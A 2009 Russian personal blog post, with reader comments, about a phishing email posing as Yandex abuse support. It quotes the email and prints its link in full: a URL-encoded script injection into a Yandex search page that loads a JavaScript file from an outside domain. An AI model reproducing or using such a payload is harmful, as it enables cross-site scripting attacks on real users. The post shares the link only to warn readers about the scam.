Смех, да и только…
2009
Решил сегодня удалить письма с яндекса, и встретил одно интересное письмо, якобы от Платона Щукина:
Дата: 02.05.09 15:58
От кого: Yandex.Abuse abuse@yandex.ru
Кому: ********@yandex.ru
Тема: Ваш сайт нарушил лицензию ЯндексаЛицом, ответственным за создание или поддержание указанного сайта была нарушена «Лицензия на использование поисковой системы Яндекса». В частности, Ваш сайт использует ссылочный спам, то есть размещает и получает ссылки, предназначенные исключительно для обмана поисковой системы и манипулирования результатами ее работы.
В силу того, что "Яндекс" не может корректно отранжировать страницы вашего сайта и сайтов, цитируемых вашим, по многим поисковым запросам, мы вынуждены временно игнорировать ссылки на сайт _mathelp.spb.ru_.
Мы не вступаем в переписку по поводу степени тяжести нарушения, конкретных адресов страниц на сайте и/или конкретных технических приемов, а также способов устранения проблемы.
Чтобы ссылки на сайт снова учитывались, вам необходимо убрать с сайта элементы, нарушающие упомянутую выше Лицензию. Восстановление может быть произведено после заполнения специальной формы для связи с техническим отделом.
–
С уважением, Платон Щукин
Служба поддержки Яндекс.Ру
И ссылка, http://mail.yandex.ru/r?url=http%3A%2F%2Fauto.yandex.ru%2Fsearch.xml%3Ftext%3D%2529%2529%253B%253C%252Fscript%253E%253Cscript%2Bsrc%253Dhttp%253A%252F%252Fdpr.papua.go.id%252F333.js%253E%253C%252Fscript%253E&ids=9150000000379771951&fs=inbox&phg=1
Если присмотреться – можно увидеть сайт, на который идёт данная ссылка. Интересно, кто ещё ведётся на такие письма?
Также мне в аську часто приходит от знакомых сообщения типа отошли бегом смс, прямо щас, не тормози, а потом как буду в онлайне – расскажу тебе все…
А потом как начинаю с ними общаться – они ничего естественно мне не отсылали!!!
PS Тут можно купить квартиру в Москве, а здесь продажа подержанных автомобилей
Метки: Abuse, Платон Щукин, ЯндэкС
Вы находитесь на личном блоге killoff.ru на котором я буду писать о WordPress, заработке на сайтах, моим странствиям по "всемирной паутине", делать обзоры важных новостей, а также выкладывать со временем темы для WordPress переведенные мною или заточенные для WP
Какая страшная ссылка….. Интересно – через сколько сайтов она прогонит человека, пока он до Яши доберется!?!
или там до Mail!
Блин, прямо жесть какая-то…. А вот насчет аськи… ломают всех подряд видимо, а люди и не знают… после такого друзья даже пароли не хотят менять…. я уж не говорю про антивирус и файрвол…. По жизни у них так в интернете: «Бегаю там, где можно… там вирусов нет….а то что «голышом», ну и ладно»… тьфу – бесят меня такие люди с таким отношением к своей личной информации…. Это тоже самое, что в школе написать сочинение на тему «Моя первый сексуальный опыт»….
ссылка типа: почта яндекс -> поиск по авто яндекс, и в итоге чтото типа ява скрипт на домене (если не ошибаюсь!) dpr_papua_go_id
а аськи походу с мобил стали чаще домать чем с компа